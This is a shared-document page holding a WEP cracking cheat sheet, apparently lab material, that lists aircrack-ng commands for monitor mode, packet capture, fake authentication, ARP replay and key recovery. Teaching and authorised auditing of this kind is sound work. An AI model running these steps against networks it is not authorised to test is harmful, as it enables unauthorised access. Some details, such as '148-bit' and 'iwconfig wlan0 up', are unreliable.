Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science
  3. Networking

WEP Auditing Cheat Sheet.doc

advertisement 
WEP Auditing cheat sheet
1) Boot into Kali Linux (or the Linux distro of choice that has the aircrack-ng suite installed)
2) Open a terminal window and make sure you are logged in as “root” (# prompt)
3) Type in “iwconfig” to display your network adapters
a. If the adapter is not on, turn it on using “iwconfig wlan0 up” this assumes that wlan0 is a compatible
wireless card that supports packet injection. Use the interface that corresponds to the correct wireless
adapter. Tip: I record all the MAC addresses of my network cards for easy identification and
configuration.
b. Record your MAC address ________________________________
4) Scan for the access point: “iwlist wlan0 scan”
a. Record the following:
 MAC address of target AP _______________________________
 Channel the AP operates on _____
 Encryption and authentication types _______________
 ESSID ____________________________
5) Put the card in monitoring mode: “airmon-ng check”
a. If you get processes that interferes just type “airmon-ng check kill”.
b. Type “airmon-ng start wlan0”
c. This should create a new interface called “mon0”, if it doesn’t substitute mon0 for the correct interface
in all the following commands.
6) List the networks that are in range by typing: “airodump-ng mon0”, verify this with step 4.
7) Open a new terminal window and make sure you are logged in as “root” (# prompt)
8) Start logging packets: “airodump-ng --channel 6 -w WEPlab --bssid xx:xx:xx:xx mon0”
a. Substitute the channel for the one you recorded in step 4.
b. –w specifies the log file we will use to capture packets in. You can call this anything.
c. Substitute the bssid with the MAC address of the AP
9) Open a new terminal window and make sure you are logged in as “root” (# prompt)
10) Complete a fake authentication to the AP: “aireplay-ng -1 0 –e [ESSID] –a xx:xx:xx:xx –h xx:xx:xx:xx mon0”
a. -1 is the fake authentication mode
b. 0 is the transmission time
c. –e is the SSID of the AP
d. –a is the MAC address of the AP
e. –h is the MAC address of your card (wlan0)
f. mon0 is the interface we are using
11) It should say “Authentication Successful”
12) Now generate IV’s, we will need 250,000 for 64-bit encryption and 1,500,000 for 148-bit. “aireplay-ng -3 -b
xx:xx:xx:xx –h xx:xx:xx:xx mon0”
a. -3 is the ARP request mode to create a replay attack and generate IV’s.
b. -b is the MAC address of the AP
c. -h is your MAC address
d. mon0 is the interface
13) After collecting enough packets we can now crack the password “hash value” “aircrack-ng -b xx:xx:xx:xx
WEPlab*.cap”
a. Remember that –b is the MAC of the AP
b. Use the same filename as in step 8, just add a “*.cap” to make sure you use all the logs.
Related documents
CrackingWPA
CrackingWPA
Team_Epsilon_Final_Video_Project
Team_Epsilon_Final_Video_Project
Wireless Cracking
Wireless Cracking
WiFi-Penetration
WiFi-Penetration
WiFi-Penetration
WiFi-Penetration
Team Planning and Reporting
Team Planning and Reporting
Chapter 1 PowerPoint
Chapter 1 PowerPoint
HOW TO SCREEN CAPTURE
HOW TO SCREEN CAPTURE
Access Control Intro, DAC and MAC
Access Control Intro, DAC and MAC
Download
advertisement